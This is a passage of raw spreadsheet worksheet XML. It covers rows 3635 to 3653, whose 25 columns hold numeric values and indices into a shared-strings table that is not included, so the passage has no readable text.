      <c r="T3635" s="12" t="s">
        <v>23719</v>
      </c>
      <c r="U3635" s="12" t="s">
        <v>23720</v>
      </c>
      <c r="V3635" s="12" t="s">
        <v>3672</v>
      </c>
      <c r="W3635" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3635" s="12">
        <v>21</v>
      </c>
      <c r="Y3635" s="12" t="s">
        <v>23721</v>
      </c>
    </row>
    <row r="3636" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3636" s="12">
        <v>24102</v>
      </c>
      <c r="B3636" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3636" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E3636" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F3636" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G3636" s="12" t="s">
        <v>23722</v>
      </c>
      <c r="H3636" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3636" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3636" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K3636" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3636" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M3636" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N3636" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O3636" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3636" s="12" t="s">
        <v>21179</v>
      </c>
      <c r="Q3636" s="12" t="s">
        <v>28323</v>
      </c>
      <c r="R3636" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3636" s="12" t="s">
        <v>23723</v>
      </c>
      <c r="T3636" s="12" t="s">
        <v>21171</v>
      </c>
      <c r="U3636" s="12" t="s">
        <v>23724</v>
      </c>
      <c r="V3636" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W3636" s="12" t="s">
        <v>23725</v>
      </c>
      <c r="X3636" s="12">
        <v>7</v>
      </c>
      <c r="Y3636" s="12" t="s">
        <v>23726</v>
      </c>
    </row>
    <row r="3637" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3637" s="12">
        <v>24142</v>
      </c>
      <c r="B3637" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3637" s="12" t="s">
        <v>30409</v>
      </c>
      <c r="F3637" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3637" s="12" t="s">
        <v>23727</v>
      </c>
      <c r="H3637" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3637" s="12" t="s">
        <v>5208</v>
      </c>
      <c r="J3637" s="12" t="s">
        <v>8064</v>
      </c>
      <c r="K3637" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3637" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3637" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3637" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3637" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3637" s="12" t="s">
        <v>23728</v>
      </c>
      <c r="Q3637" s="12" t="s">
        <v>28324</v>
      </c>
      <c r="R3637" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3637" s="12" t="s">
        <v>23729</v>
      </c>
      <c r="T3637" s="12" t="s">
        <v>4675</v>
      </c>
      <c r="U3637" s="12" t="s">
        <v>23730</v>
      </c>
      <c r="V3637" s="12" t="s">
        <v>8064</v>
      </c>
      <c r="W3637" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3637" s="12">
        <v>11</v>
      </c>
      <c r="Y3637" s="12" t="s">
        <v>23731</v>
      </c>
    </row>
    <row r="3638" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3638" s="12">
        <v>24202</v>
      </c>
      <c r="B3638" s="12" t="s">
        <v>31348</v>
      </c>
      <c r="D3638" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3638" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F3638" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3638" s="12" t="s">
        <v>23732</v>
      </c>
      <c r="H3638" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3638" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3638" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K3638" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3638" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3638" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3638" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3638" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3638" s="12" t="s">
        <v>23733</v>
      </c>
      <c r="Q3638" s="12" t="s">
        <v>28323</v>
      </c>
      <c r="R3638" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3638" s="12" t="s">
        <v>23734</v>
      </c>
      <c r="T3638" s="12" t="s">
        <v>23115</v>
      </c>
      <c r="U3638" s="12" t="s">
        <v>23735</v>
      </c>
      <c r="V3638" s="12" t="s">
        <v>18373</v>
      </c>
      <c r="W3638" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3638" s="12">
        <v>19</v>
      </c>
      <c r="Y3638" s="12" t="s">
        <v>23736</v>
      </c>
    </row>
    <row r="3639" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3639" s="12">
        <v>24272</v>
      </c>
      <c r="B3639" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3639" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E3639" s="12" t="s">
        <v>31481</v>
      </c>
      <c r="F3639" s="12" t="s">
        <v>31382</v>
      </c>
      <c r="G3639" s="12" t="s">
        <v>23737</v>
      </c>
      <c r="H3639" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3639" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J3639" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3639" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3639" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M3639" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N3639" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O3639" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3639" s="12" t="s">
        <v>23738</v>
      </c>
      <c r="Q3639" s="12" t="s">
        <v>28324</v>
      </c>
      <c r="R3639" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3639" s="12" t="s">
        <v>23739</v>
      </c>
      <c r="T3639" s="12" t="s">
        <v>19539</v>
      </c>
      <c r="U3639" s="12" t="s">
        <v>23740</v>
      </c>
      <c r="V3639" s="12" t="s">
        <v>3916</v>
      </c>
      <c r="W3639" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3639" s="12">
        <v>10</v>
      </c>
      <c r="Y3639" s="12" t="s">
        <v>23741</v>
      </c>
    </row>
    <row r="3640" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3640" s="12">
        <v>24302</v>
      </c>
      <c r="B3640" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3640" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3640" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F3640" s="12" t="s">
        <v>30342</v>
      </c>
      <c r="G3640" s="12" t="s">
        <v>23742</v>
      </c>
      <c r="H3640" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3640" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J3640" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K3640" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L3640" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3640" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3640" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3640" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3640" s="12" t="s">
        <v>23743</v>
      </c>
      <c r="Q3640" s="12" t="s">
        <v>28280</v>
      </c>
      <c r="R3640" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3640" s="12" t="s">
        <v>23744</v>
      </c>
      <c r="T3640" s="12" t="s">
        <v>23745</v>
      </c>
      <c r="U3640" s="12" t="s">
        <v>23746</v>
      </c>
      <c r="V3640" s="12" t="s">
        <v>200</v>
      </c>
      <c r="W3640" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3640" s="12">
        <v>13</v>
      </c>
      <c r="Y3640" s="12" t="s">
        <v>23747</v>
      </c>
    </row>
    <row r="3641" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3641" s="12">
        <v>24312</v>
      </c>
      <c r="B3641" s="12" t="s">
        <v>30804</v>
      </c>
      <c r="C3641" s="12" t="s">
        <v>30805</v>
      </c>
      <c r="D3641" s="12" t="s">
        <v>30800</v>
      </c>
      <c r="E3641" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F3641" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3641" s="12" t="s">
        <v>23748</v>
      </c>
      <c r="H3641" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3641" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3641" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K3641" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3641" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M3641" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N3641" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O3641" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3641" s="12" t="s">
        <v>23683</v>
      </c>
      <c r="Q3641" s="12" t="s">
        <v>28324</v>
      </c>
      <c r="R3641" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3641" s="12" t="s">
        <v>23749</v>
      </c>
      <c r="T3641" s="12" t="s">
        <v>17876</v>
      </c>
      <c r="U3641" s="12" t="s">
        <v>23750</v>
      </c>
      <c r="V3641" s="12" t="s">
        <v>18373</v>
      </c>
      <c r="W3641" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3641" s="12">
        <v>6</v>
      </c>
      <c r="Y3641" s="12" t="s">
        <v>23751</v>
      </c>
    </row>
    <row r="3642" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3642" s="12">
        <v>24342</v>
      </c>
      <c r="B3642" s="12" t="s">
        <v>31348</v>
      </c>
      <c r="D3642" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3642" s="12" t="s">
        <v>31437</v>
      </c>
      <c r="F3642" s="12" t="s">
        <v>31307</v>
      </c>
      <c r="G3642" s="12" t="s">
        <v>23752</v>
      </c>
      <c r="H3642" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3642" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3642" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K3642" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3642" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3642" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3642" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3642" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3642" s="12" t="s">
        <v>23753</v>
      </c>
      <c r="Q3642" s="12" t="s">
        <v>28322</v>
      </c>
      <c r="R3642" s="12" t="s">
        <v>11549</v>
      </c>
      <c r="S3642" s="12" t="s">
        <v>23754</v>
      </c>
      <c r="T3642" s="12" t="s">
        <v>23755</v>
      </c>
      <c r="U3642" s="12" t="s">
        <v>23756</v>
      </c>
      <c r="V3642" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W3642" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3642" s="12">
        <v>20</v>
      </c>
      <c r="Y3642" s="12" t="s">
        <v>23757</v>
      </c>
    </row>
    <row r="3643" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3643" s="12">
        <v>24362</v>
      </c>
      <c r="B3643" s="12" t="s">
        <v>30189</v>
      </c>
      <c r="D3643" s="12" t="s">
        <v>30162</v>
      </c>
      <c r="E3643" s="12" t="s">
        <v>31454</v>
      </c>
      <c r="F3643" s="12" t="s">
        <v>30188</v>
      </c>
      <c r="G3643" s="12" t="s">
        <v>23758</v>
      </c>
      <c r="H3643" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3643" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J3643" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K3643" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3643" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3643" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3643" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3643" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3643" s="12" t="s">
        <v>23759</v>
      </c>
      <c r="Q3643" s="12" t="s">
        <v>28324</v>
      </c>
      <c r="R3643" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3643" s="12" t="s">
        <v>23760</v>
      </c>
      <c r="T3643" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3643" s="12" t="s">
        <v>23761</v>
      </c>
      <c r="V3643" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W3643" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3643" s="12">
        <v>2</v>
      </c>
      <c r="Y3643" s="12" t="s">
        <v>23762</v>
      </c>
    </row>
    <row r="3644" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3644" s="12">
        <v>24372</v>
      </c>
      <c r="B3644" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3644" s="12" t="s">
        <v>30190</v>
      </c>
      <c r="E3644" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F3644" s="12" t="s">
        <v>30190</v>
      </c>
      <c r="G3644" s="12" t="s">
        <v>23763</v>
      </c>
      <c r="H3644" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3644" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J3644" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K3644" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3644" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3644" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3644" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3644" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3644" s="12" t="s">
        <v>23764</v>
      </c>
      <c r="Q3644" s="12" t="s">
        <v>28324</v>
      </c>
      <c r="R3644" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3644" s="12" t="s">
        <v>23765</v>
      </c>
      <c r="T3644" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3644" s="12" t="s">
        <v>23766</v>
      </c>
      <c r="V3644" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W3644" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3644" s="12">
        <v>2</v>
      </c>
      <c r="Y3644" s="12" t="s">
        <v>23767</v>
      </c>
    </row>
    <row r="3645" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3645" s="12">
        <v>24382</v>
      </c>
      <c r="B3645" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3645" s="12" t="s">
        <v>30410</v>
      </c>
      <c r="E3645" s="12" t="s">
        <v>31492</v>
      </c>
      <c r="F3645" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3645" s="12" t="s">
        <v>23768</v>
      </c>
      <c r="H3645" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3645" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3645" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K3645" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3645" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3645" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3645" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3645" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3645" s="12" t="s">
        <v>23764</v>
      </c>
      <c r="Q3645" s="12" t="s">
        <v>28324</v>
      </c>
      <c r="R3645" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3645" s="12" t="s">
        <v>23769</v>
      </c>
      <c r="T3645" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3645" s="12" t="s">
        <v>23770</v>
      </c>
      <c r="V3645" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W3645" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3645" s="12">
        <v>2</v>
      </c>
      <c r="Y3645" s="12" t="s">
        <v>23771</v>
      </c>
    </row>
    <row r="3646" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3646" s="12">
        <v>24392</v>
      </c>
      <c r="B3646" s="12" t="s">
        <v>28354</v>
      </c>
      <c r="D3646" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3646" s="12" t="s">
        <v>31492</v>
      </c>
      <c r="F3646" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3646" s="12" t="s">
        <v>23772</v>
      </c>
      <c r="H3646" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3646" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3646" s="12" t="s">
        <v>81</v>
      </c>
      <c r="K3646" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3646" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3646" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3646" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3646" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3646" s="12" t="s">
        <v>21179</v>
      </c>
      <c r="Q3646" s="12" t="s">
        <v>28323</v>
      </c>
      <c r="R3646" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3646" s="12" t="s">
        <v>23773</v>
      </c>
      <c r="T3646" s="12" t="s">
        <v>23074</v>
      </c>
      <c r="U3646" s="12" t="s">
        <v>23774</v>
      </c>
      <c r="V3646" s="12" t="s">
        <v>6391</v>
      </c>
      <c r="W3646" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3646" s="12">
        <v>12</v>
      </c>
      <c r="Y3646" s="12" t="s">
        <v>23775</v>
      </c>
    </row>
    <row r="3647" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3647" s="12">
        <v>24462</v>
      </c>
      <c r="B3647" s="12" t="s">
        <v>31348</v>
      </c>
      <c r="D3647" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3647" s="12" t="s">
        <v>31492</v>
      </c>
      <c r="F3647" s="12" t="s">
        <v>31307</v>
      </c>
      <c r="G3647" s="12" t="s">
        <v>23776</v>
      </c>
      <c r="H3647" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3647" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3647" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K3647" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3647" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3647" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3647" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3647" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3647" s="12" t="s">
        <v>23777</v>
      </c>
      <c r="Q3647" s="12" t="s">
        <v>28324</v>
      </c>
      <c r="R3647" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3647" s="12" t="s">
        <v>23778</v>
      </c>
      <c r="T3647" s="12" t="s">
        <v>3213</v>
      </c>
      <c r="U3647" s="12" t="s">
        <v>23779</v>
      </c>
      <c r="V3647" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W3647" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3647" s="12">
        <v>17</v>
      </c>
      <c r="Y3647" s="12" t="s">
        <v>23780</v>
      </c>
    </row>
    <row r="3648" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3648" s="12">
        <v>24492</v>
      </c>
      <c r="B3648" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3648" s="12" t="s">
        <v>30721</v>
      </c>
      <c r="E3648" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3648" s="12" t="s">
        <v>30739</v>
      </c>
      <c r="G3648" s="12" t="s">
        <v>23781</v>
      </c>
      <c r="H3648" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3648" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3648" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K3648" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3648" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M3648" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N3648" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O3648" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3648" s="12" t="s">
        <v>23782</v>
      </c>
      <c r="Q3648" s="12" t="s">
        <v>28280</v>
      </c>
      <c r="R3648" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3648" s="12" t="s">
        <v>23783</v>
      </c>
      <c r="T3648" s="12" t="s">
        <v>23784</v>
      </c>
      <c r="U3648" s="12" t="s">
        <v>23785</v>
      </c>
      <c r="V3648" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W3648" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3648" s="12">
        <v>42</v>
      </c>
      <c r="Y3648" s="12" t="s">
        <v>23786</v>
      </c>
    </row>
    <row r="3649" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3649" s="12">
        <v>24522</v>
      </c>
      <c r="B3649" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3649" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E3649" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3649" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3649" s="12" t="s">
        <v>23787</v>
      </c>
      <c r="H3649" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3649" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3649" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K3649" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3649" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3649" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3649" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3649" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="Q3649" s="12" t="s">
        <v>28323</v>
      </c>
      <c r="R3649" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3649" s="12" t="s">
        <v>23788</v>
      </c>
      <c r="T3649" s="12" t="s">
        <v>23789</v>
      </c>
      <c r="U3649" s="12" t="s">
        <v>23790</v>
      </c>
      <c r="V3649" s="12" t="s">
        <v>9956</v>
      </c>
      <c r="W3649" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3649" s="12">
        <v>5</v>
      </c>
      <c r="Y3649" s="12" t="s">
        <v>23791</v>
      </c>
    </row>
    <row r="3650" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3650" s="12">
        <v>24532</v>
      </c>
      <c r="B3650" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3650" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3650" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F3650" s="12" t="s">
        <v>31093</v>
      </c>
      <c r="G3650" s="12" t="s">
        <v>23792</v>
      </c>
      <c r="H3650" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3650" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3650" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3650" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3650" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3650" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3650" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3650" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3650" s="12" t="s">
        <v>23793</v>
      </c>
      <c r="Q3650" s="12" t="s">
        <v>28321</v>
      </c>
      <c r="R3650" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3650" s="12" t="s">
        <v>23794</v>
      </c>
      <c r="T3650" s="12" t="s">
        <v>23795</v>
      </c>
      <c r="U3650" s="12" t="s">
        <v>23796</v>
      </c>
      <c r="V3650" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W3650" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3650" s="12">
        <v>2</v>
      </c>
      <c r="Y3650" s="12" t="s">
        <v>23797</v>
      </c>
    </row>
    <row r="3651" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3651" s="12">
        <v>24582</v>
      </c>
      <c r="B3651" s="12" t="s">
        <v>31024</v>
      </c>
      <c r="C3651" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D3651" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3651" s="12" t="s">
        <v>31492</v>
      </c>
      <c r="F3651" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3651" s="12" t="s">
        <v>23802</v>
      </c>
      <c r="H3651" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3651" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3651" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K3651" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3651" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3651" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3651" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3651" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3651" s="12" t="s">
        <v>23764</v>
      </c>
      <c r="Q3651" s="12" t="s">
        <v>28324</v>
      </c>
      <c r="R3651" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3651" s="12" t="s">
        <v>23803</v>
      </c>
      <c r="T3651" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3651" s="12" t="s">
        <v>23804</v>
      </c>
      <c r="V3651" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W3651" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3651" s="12">
        <v>17</v>
      </c>
      <c r="Y3651" s="12" t="s">
        <v>23805</v>
      </c>
    </row>
    <row r="3652" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3652" s="12">
        <v>24592</v>
      </c>
      <c r="B3652" s="12" t="s">
        <v>30804</v>
      </c>
      <c r="C3652" s="12" t="s">
        <v>30781</v>
      </c>
      <c r="D3652" s="12" t="s">
        <v>30800</v>
      </c>
      <c r="E3652" s="12" t="s">
        <v>31496</v>
      </c>
      <c r="F3652" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3652" s="12" t="s">
        <v>23806</v>
      </c>
      <c r="H3652" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3652" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3652" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3652" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3652" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3652" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3652" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3652" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3652" s="12" t="s">
        <v>23777</v>
      </c>
      <c r="Q3652" s="12" t="s">
        <v>28324</v>
      </c>
      <c r="R3652" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3652" s="12" t="s">
        <v>23807</v>
      </c>
      <c r="T3652" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3652" s="12" t="s">
        <v>23808</v>
      </c>
      <c r="V3652" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W3652" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3652" s="12">
        <v>1</v>
      </c>
      <c r="Y3652" s="12" t="s">
        <v>23809</v>
      </c>
    </row>
    <row r="3653" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3653" s="12">
        <v>24602</v>
      </c>
      <c r="B3653" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3653" s="12" t="s">
        <v>30410</v>
      </c>
      <c r="E3653" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3653" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3653" s="12" t="s">
        <v>23810</v>
      </c>
      <c r="H3653" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3653" s="12" t="s">
        <v>5208</v>
      </c>
      <c r="J3653" s="12" t="s">
        <v>8064</v>
      </c>
      <c r="K3653" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3653" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3653" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3653" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3653" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3653" s="12" t="s">
        <v>23777</v>
      </c>
      <c r="Q3653" s="12" t="s">
        <v>28324</v>
      </c>
      <c r="R3653" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3653" s="12" t="s">
        <v>23811</v>
      </c>
      <c r="T3653" s="12" t="s">
        <v>9294</v>
      </c>
      <c r="U3653" s="12" t="s">
        <v>23812</v>
      </c>
